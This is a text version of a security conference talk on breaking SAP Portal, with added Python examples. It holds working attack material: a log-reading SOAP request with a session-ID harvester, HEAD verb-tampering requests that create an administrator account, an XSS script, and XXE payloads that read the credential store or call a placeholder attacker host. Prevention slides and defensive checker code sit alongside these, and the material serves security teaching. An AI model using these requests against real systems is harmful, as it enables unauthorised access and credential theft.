Breaking SAP Portal (HashDays)
![Page 1: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/1.jpg)
Invest in security to secure investments
Breaking SAP Portal
Alexander Polyakov, CTO, ERPScan
![Page 2: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/2.jpg)
About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
![Page 3: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/3.jpg)
Agenda
• Say hello to SAP Portal
• Breaking Portal through SAP services
• Breaking Portal through the J2EE Engine
• Breaking Portal through Portal issues
• ERPScan SAP Pentesting Tool password decrypt module
• Conclusion
![Page 4: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/4.jpg)
SAP
• The most popular business application
• More than 180000 customers worldwide
• 74% of the Forbes 500 run SAP
![Page 5: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/5.jpg)
Meet sapscan.com
http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
![Page 6: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/6.jpg)
Say hello to Portal
• Point of web access to SAP systems
• Point of web access to other corporate systems
• Way for attackers to get access to SAP from the Internet
• ~17 Portals in Switzerland, according to Shodan
• ~11 Portals in Switzerland, according to Google
![Page 7: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/7.jpg)
EP architecture
![Page 8: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/8.jpg)
Okay, okay. SAP Portal is important, and it has many links to other modules. So what?
![Page 9: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/9.jpg)
SAP Management Console
![Page 10: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/10.jpg)
SAP Management Console
• SAP MC provides a common framework for centralized system management
• It allows viewing trace and log messages
• Using a JSESSIONID taken from the logs, an attacker can log into the Portal
What can we find in the logs?
Right! The file userinterface.log contains the calculated JSESSIONID
But... the attacker must have credentials to read the log file!
Wrong!
![Page 11: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/11.jpg)
SAP Management Console
SOAP request to the SAP Management Console web service (sapstartsrv, method ReadLogFile) that returns the last %COUNT% entries of the J2EE user-interface log:

```xml
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%COUNT%</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
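As an added example (not part of the slides and not ERPScan's tool), the Python below assembles the ReadLogFile envelope shown above and harvests JSESSIONID values from the answer, which is the step the slide leaves implicit. The response text and the log-line layout are constructed samples; the real field layout differs between releases, and whether the method answers unauthenticated at all depends on which web methods the host's sapstartsrv protects.

```python
"""Added example (not from the slides, not ERPScan's tool): build the
SAPControl ReadLogFile request shown above and harvest JSESSIONID values
from the answer. Runs offline against a constructed response."""
import re
from xml.sax.saxutils import escape

USERINTERFACE_LOG = "j2ee/cluster/server0/log/system/userinterface.log"

# A session cookie as it appears in a log line; the value runs until
# whitespace, a separator or XML framing. Token alphabet is an assumption.
JSESSIONID_RE = re.compile(r"""JSESSIONID=([^\s;,"'<>]+)""")
SOAP_FAULT_RE = re.compile(r"<([\w.-]+:)?Fault[\s>]")


def build_readlogfile_request(filename=USERINTERFACE_LOG, maxentries=100):
    """The envelope from the slide, with %COUNT% replaced by a real number
    and the file name XML-escaped."""
    return (
        '<?xml version="1.0"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
        'xmlns:xs="http://www.w3.org/2001/XMLSchema">'
        "<SOAP-ENV:Header>"
        '<sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">'
        "<enableSession>true</enableSession></sapsess:Session>"
        "</SOAP-ENV:Header><SOAP-ENV:Body>"
        '<ns1:ReadLogFile xmlns:ns1="urn:SAPControl">'
        f"<filename>{escape(filename)}</filename><filter/><language/>"
        f"<maxentries>{int(maxentries)}</maxentries><statecookie>EOF</statecookie>"
        "</ns1:ReadLogFile></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


def is_soap_fault(response_text):
    """True when sapstartsrv answered with a Fault, e.g. because ReadLogFile
    is on the host's list of protected web methods and needs credentials."""
    return SOAP_FAULT_RE.search(response_text) is not None


def extract_session_ids(response_text):
    """Unique JSESSIONID values found in the returned log text, sorted."""
    return sorted(set(JSESSIONID_RE.findall(response_text)))


# Constructed: two log entries, one repeated, inside a ReadLogFile answer.
SAMPLE_RESPONSE = """<SOAP-ENV:Envelope><SOAP-ENV:Body><ReadLogFileResponse><fields>
<item>#1.5 2012-10-31 10:02:11 session created JSESSIONID=(J2EE1234567)ID0001abcdEnd user=admin</item>
<item>#1.5 2012-10-31 10:02:12 session created JSESSIONID=(J2EE1234567)ID0002wxyzEnd user=jdoe</item>
<item>#1.5 2012-10-31 10:02:13 session created JSESSIONID=(J2EE1234567)ID0001abcdEnd user=admin</item>
</fields></ReadLogFileResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""

# Constructed: what a protected method returns without credentials.
SAMPLE_FAULT = """<SOAP-ENV:Envelope><SOAP-ENV:Body><SOAP-ENV:Fault>
<faultstring>Invalid Credentials</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>"""

if __name__ == "__main__":
    print(build_readlogfile_request(maxentries=5))
    if not is_soap_fault(SAMPLE_RESPONSE):
        print(extract_session_ids(SAMPLE_RESPONSE))
```

Seeing session identifiers come back from an unauthenticated ReadLogFile call is the finding; the defensive counterpart is the next slide (no TRACE_LEVEL 3 in production) plus keeping ReadLogFile among the protected web methods of sapstartsrv.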
![Page 12: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/12.jpg)
Prevention
Don't use TRACE_LEVEL = 3 in production systems, or delete the traces
http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
![Page 13: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/13.jpg)
Single Sign-On
![Page 14: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/14.jpg)
SSO (old but still works)
• SAP implements SSO using the Header Variable Login Module: the J2EE Engine trusts the user name that the authenticating front end (web server or proxy) puts into an HTTP header, so an attacker who can reach the J2EE Engine directly supplies that header himself and receives a valid session cookie
(Diagram: the user sends credentials to the front end, which checks them and answers "okay" with a cookie; the attacker sends header_auth straight to the engine and also gets a cookie.)
thanks Mariano ;)
![Page 15: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/15.jpg)
Prevention
• Implement proper network filters to avoid direct connections to the SAP J2EE Engine
• If you use the Header Variable Login Module for Windows authentication, switch to SPNegoLoginModule
http://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/a3d940c2653126e10000000a1550b0/frameset.htm
![Page 16: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/16.jpg)
SAP NetWeaver J2EE
![Page 17: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/17.jpg)
Access control
• Web Dynpro: programmatic
• Portal iViews: programmatic
• J2EE web apps: declarative
Programmatic: enforced by UME (User Management Engine)
Declarative: enforced by WEB.XML
![Page 18: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/18.jpg)
DeclaraEve access control
• The central entity in the J2EE authorization model is the security role
• Programmers define the application-specific roles in the J2EE deployment descriptors
web.xml, web-j2ee-engine.xml
![Page 19: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/19.jpg)
Verb Tampering
![Page 20: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/20.jpg)
web.xml
```xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
```
![Page 21: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/21.jpg)
Verb Tampering
• If we try to access the application using GET, we need a login:password and the administrator role
• What if we try to access the application using HEAD instead of GET? The constraint lists GET only, so HEAD is not covered
• PROFIT!
• Did you know about ctc?
![Page 22: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/22.jpg)
Verb Tampering
Need an admin account in SAP Portal? Just send two HEAD requests
• Create a new user blabla:blabla
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
• Add user blabla to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators
Works when UME uses the Java database as its data source
![Page 23: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/23.jpg)
PrevenEon
• Install SAP notes 1503579 and 1616259
• Install the other SAP notes about verb tampering
• Scan applications with the ERPScan WEB.XML checker
• Disable the applications that are not necessary
![Page 24: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/24.jpg)
Invoker servlet
![Page 25: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/25.jpg)
web.xml
The same descriptor after the verb tampering fix, with HEAD added to the constraint:

```xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>HEAD</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
```

GET /admin/critical/CriticalAction
GET /servlet/com.sap.admin.Critical.Action
The first URL goes through the /admin/* constraint; the second reaches the same class through the invoker servlet's /servlet/ path, which no constraint covers
![Page 26: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/26.jpg)
Invoker Servlet
• Want to execute an OS command on the J2EE server remotely?
• Maybe upload a backdoor in a Java class?
• Or sniff all traffic?
Still remember ctc?
![Page 27: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/27.jpg)
Invoker Servlet
![Page 28: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/28.jpg)
Prevention
• Install SAP notes 1467771 and 1445998
• "EnableInvokerServletGlobally" must be "false"
• Check all WEB.XML files with the ERPScan WEB.XML checker
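Added example, not the ERPScan WEB.XML checker referred to above: a small Python audit over a web.xml that flags both issues from the Verb Tampering and Invoker servlet sections, constraints that enumerate <http-method> (any verb not listed bypasses them) and servlet classes that the invoker servlet would serve under /servlet/<class> outside every constraint. The <web-app> wrapper around the slide's fragment and the hardened variant are mine.

```python
"""Added example, not ERPScan's WEB.XML checker: flag the two web.xml
weaknesses from the slides in any J2EE deployment descriptor."""
import xml.etree.ElementTree as ET


def _local(tag):
    # Drop a namespace prefix such as {http://java.sun.com/xml/ns/j2ee}
    return tag.rsplit("}", 1)[-1]


def _texts(parent, name):
    return [c.text.strip() for c in parent if _local(c.tag) == name and c.text]


def audit_web_xml(xml_text):
    """Return human-readable findings; an empty list means neither issue applies."""
    root = ET.fromstring(xml_text)
    findings, servlets, fully_constrained = [], {}, []
    for el in root:
        tag = _local(el.tag)
        if tag == "servlet":
            names, classes = _texts(el, "servlet-name"), _texts(el, "servlet-class")
            if names and classes:
                servlets[names[0]] = classes[0]
        elif tag == "security-constraint":
            for wrc in (c for c in el if _local(c.tag) == "web-resource-collection"):
                patterns, methods = _texts(wrc, "url-pattern"), _texts(wrc, "http-method")
                if methods:
                    # Enumerating methods restricts the constraint to exactly those;
                    # HEAD, PUT or an arbitrary verb reaches the servlet unauthenticated.
                    findings.append(f"verb tampering: {patterns} constrained only for "
                                    f"{methods}; drop <http-method> to cover every verb")
                else:
                    fully_constrained.extend(patterns)
    # With EnableInvokerServletGlobally=true each class is also served under
    # /servlet/<class>, a path that an /admin/* pattern never matches.
    if not any(p in ("/*", "/servlet/*") for p in fully_constrained):
        for name, cls in servlets.items():
            findings.append(f"invoker servlet: {name} is reachable as /servlet/{cls} "
                            "past every constraint if the invoker servlet is enabled")
    return findings


# The descriptor from the slide, wrapped in <web-app> (constructed wrapper).
SLIDE_WEB_XML = """<web-app>
<servlet><servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class></servlet>
<servlet-mapping><servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern></servlet-mapping>
<security-constraint>
  <web-resource-collection><web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern><http-method>GET</http-method></web-resource-collection>
  <auth-constraint><role-name>administrator</role-name></auth-constraint>
</security-constraint></web-app>"""

# The slide's fix: HEAD added. Still a method list, so still incomplete.
HEAD_ADDED_WEB_XML = SLIDE_WEB_XML.replace(
    "<http-method>GET</http-method>",
    "<http-method>GET</http-method><http-method>HEAD</http-method>")

# Hardened variant: no method list, and the invoker path is inside the constraint.
HARDENED_WEB_XML = SLIDE_WEB_XML.replace(
    "<url-pattern>/admin/*</url-pattern><http-method>GET</http-method>",
    "<url-pattern>/admin/*</url-pattern><url-pattern>/servlet/*</url-pattern>")

if __name__ == "__main__":
    for label, doc in (("slide", SLIDE_WEB_XML), ("head added", HEAD_ADDED_WEB_XML),
                       ("hardened", HARDENED_WEB_XML)):
        print(label, audit_web_xml(doc))
```

Note that the descriptor with HEAD added still gets both findings: listing one more verb does not close the hole for POST, PUT or made-up methods, which is why the constraint should name no <http-method> at all and why the invoker servlet has to be disabled server-wide rather than papered over per application.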
![Page 29: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/29.jpg)
So, where is Portal?
![Page 30: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/30.jpg)
SAP Portal
• User access rights to objects are kept in the Portal Content Directory (PCD)
• Based on ACLs
• 2 types of access:
– design time, for administrators
– runtime, for users
![Page 31: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/31.jpg)
Portal Permission Levels
![Page 32: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/32.jpg)
End User permission
The objects where end user permission is enabled affect the following areas in Portal:
– All Portal Catalog objects with end user permission
– Authorized Portal users may access restricted Portal components by URL without an intermediate iView if they are granted permission in the appropriate security zone
![Page 33: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/33.jpg)
Administrator permission
• Owner = full control + modify permissions
• Full control = read/write + delete objects
• Read/Write = read + write + edit properties + add/remove child objects
• Write (folders only) = create objects
• Read = view objects + create instances (delta links and copies)
• None = access not granted
![Page 34: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/34.jpg)
Role Assigner permission
• The Role Assigner permission setting is available for role objects
• It allows you to determine which Portal users are permitted to assign other users, groups, or roles to the role principal using the Role Assignment tool
![Page 35: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/35.jpg)
Security Zones
• Security zones allow the system administrator to control which Portal components and Portal services a Portal user can launch
• A security zone specifies the vendor ID, the security area, and the safety level for each Portal component and Portal service
• The security zone is defined in a Portal application descriptor XML file
• A Portal component or service can only belong to one security zone; however, Portal components and services may share the same safety level
• Zones allow the administrator to assign permissions to a safety level instead of assigning them directly to each Portal component or service
Why? To group multiple iViews easily
![Page 36: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/36.jpg)
We can get access to Portal iViews using a direct URL:
/irj/servlet/prt/portal/prtroot/<iView_ID>
and only the Security Zone rights will be checked
![Page 37: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/37.jpg)
Security Zones
• So, SecZones offer an extra, but optional, layer of code-level security for iViews
– User -> check "end user" permission on the role -> view iView
– User -> check "end user" permission on the role -> check "end user" permission on the SecZone -> view iView
By default, this functionality is disabled
![Page 38: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/38.jpg)
So I wonder how many Portal applications with No/Low Safety exist?
![Page 39: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/39.jpg)
Safety Levels for Security Zone
• No Safety
– Anonymous users are permitted to access portal components defined in the security zone
• Low Safety
– A user must be at least an authenticated portal user to access portal components defined in the security zone
• Medium Safety
– A user must be assigned to a particular portal role that is authorized to access portal components defined in the security zone
• High Safety
– A user must be assigned to a portal role with higher administrative rights that is authorized to access portal components defined in the security zone
![Page 40: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/40.jpg)
No safety zone
Many custom applications sit in a low-safety security zone
![Page 41: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/41.jpg)
Prevention
Check security zone permissions
• http://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm
• http://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm
![Page 42: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/42.jpg)
SAP Portal
• Web-based services
• All OWASP Top 10 issues apply
– XSS
– Phishing
– Traversal
– XXE
– ...
![Page 43: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/43.jpg)
EPCF
![Page 44: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/44.jpg)
XSS
• Many XSSs in Portal
• But sometimes the session cookie is "httponly"
• But when we exploit XSS, we can use the features of SAP Portal itself: injected script can call the client-side EPCF API and read the data iViews keep in the browser, cookie or no cookie
![Page 45: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/45.jpg)
```html
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
</SCRIPT>
```
![Page 46: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/46.jpg)
EPCF
EPCF provides a JavaScript API designed for client-side communication between portal components and the portal core framework
• Enterprise Portal Client Manager (EPCM)
• iViews can access the EPCM object from every portal page or IFrame
• Every iView contains the EPCM object
• For example, EPCF is used as a transient user-data buffer for iViews
![Page 47: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/47.jpg)
Prevention
Install SAP note 1656549
![Page 48: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/48.jpg)
KM Phishing
SAP Knowledge Management may be used to create phishing pages
![Page 49: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/49.jpg)
FIX
![Page 50: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/50.jpg)
Directory traversal
![Page 51: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/51.jpg)
Directory traversal fix bypass
![Page 52: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/52.jpg)
Prevention
Install SAP note 1630293
![Page 53: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/53.jpg)
Cut the Crap, Show Me the Hack
![Page 54: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/54.jpg)
Breaking SAP Portal
• Found a file in the OS of SAP Portal with the encrypted passwords for administration and the DB
• Found a file in the OS of SAP Portal with the keys to decrypt those passwords
• Found a vulnerability (another one ;)) which allows reading the files with the passwords and keys
• Decrypt the passwords and log into Portal
• PROFIT!
![Page 55: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/55.jpg)
Read file
How can we read the file?
– Directory traversal
– OS command execution
– XML External Entity (XXE)
![Page 56: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/56.jpg)
XXE in Portal
![Page 57: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/57.jpg)
XXE in Portal
![Page 58: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/58.jpg)
XXE
Error-based XXE
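The XXE slides survive only as titles, so here is an added example (not from the talk) of the check a consumer of untrusted XML should run before any parser touches the input: classify the document by its DTD, refuse anything that declares an external entity or any DOCTYPE at all, and handle the UTF-16 encoding trick that a bytes-only filter misses. All payloads are constructed; the file path reuses the SecStore.properties location from the following slides, and attacker.invalid is a reserved placeholder name.

```python
"""Added example, not from the slides: refuse XML that declares a DTD before
any parser can resolve entities. Samples below are constructed."""
import codecs
import re
import xml.etree.ElementTree as ET

# <!ENTITY name SYSTEM "..."> or a parameter entity <!ENTITY % name SYSTEM "...">
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s+)?[^\s>]+\s+(SYSTEM|PUBLIC)\b", re.I)
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)


def decode_xml_bytes(data):
    """Decode by BOM / leading bytes so a UTF-16 payload cannot hide from
    patterns that a naive filter would apply to the raw bytes."""
    for bom, enc in ((codecs.BOM_UTF8, "utf-8"),
                     (codecs.BOM_UTF16_LE, "utf-16-le"),
                     (codecs.BOM_UTF16_BE, "utf-16-be")):
        if data.startswith(bom):
            return data[len(bom):].decode(enc, errors="replace")
    if data[:2] == b"<\x00":
        return data.decode("utf-16-le", errors="replace")
    if data[:2] == b"\x00<":
        return data.decode("utf-16-be", errors="replace")
    return data.decode("utf-8", errors="replace")


def classify_xml(data):
    """'external-entity' (SYSTEM/PUBLIC entity), 'dtd' (any other DOCTYPE) or 'clean'."""
    text = decode_xml_bytes(data)
    if EXTERNAL_ENTITY_RE.search(text):
        return "external-entity"
    if DOCTYPE_RE.search(text):
        return "dtd"
    return "clean"


def parse_untrusted_xml(data):
    """Parse only DTD-free documents; untrusted input never needs entities."""
    verdict = classify_xml(data)
    if verdict != "clean":
        raise ValueError(f"refusing XML with a {verdict} declaration")
    return ET.fromstring(data)


# Constructed: classic in-band read of the file discussed on the next slides.
XXE_FILE = ('<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM '
            '"file:///usr/sap/TTT/SYS/global/security/data/SecStore.properties">]>'
            '<x>&xxe;</x>')
# Constructed: error-based / out-of-band variant, a parameter entity pulls an attacker DTD.
XXE_OOB = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % dtd SYSTEM '
           b'"http://attacker.invalid/evil.dtd"> %dtd;]><x>&send;</x>')
# Constructed: harmless internal entity (still a DTD, still refused) and a clean document.
INTERNAL_DTD = b'<!DOCTYPE x [<!ENTITY greet "hi">]><x>&greet;</x>'
CLEAN = b'<?xml version="1.0"?><order><id>42</id></order>'

if __name__ == "__main__":
    for name, doc in (("file read", XXE_FILE.encode("utf-8")),
                      ("file read, UTF-16", XXE_FILE.encode("utf-16")),
                      ("error-based", XXE_OOB), ("internal", INTERNAL_DTD), ("clean", CLEAN)):
        print(f"{name:20s} -> {classify_xml(doc)}")
```

Rejecting every DOCTYPE is deliberate: the error-based variant on this slide needs no in-band output, so a filter that only looks for file:// URLs or only blocks general entities is not enough, and the parser's own entity-resolution switches should be off as a second layer regardless.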
![Page 59: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/59.jpg)
Breaking SAP Portal
• OK, we can read files
• Where are the passwords?
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
![Page 60: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/60.jpg)
Where are the passwords? (config.properties)

```properties
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTT/sapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
```
![Page 62: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/62.jpg)
But where is the key?
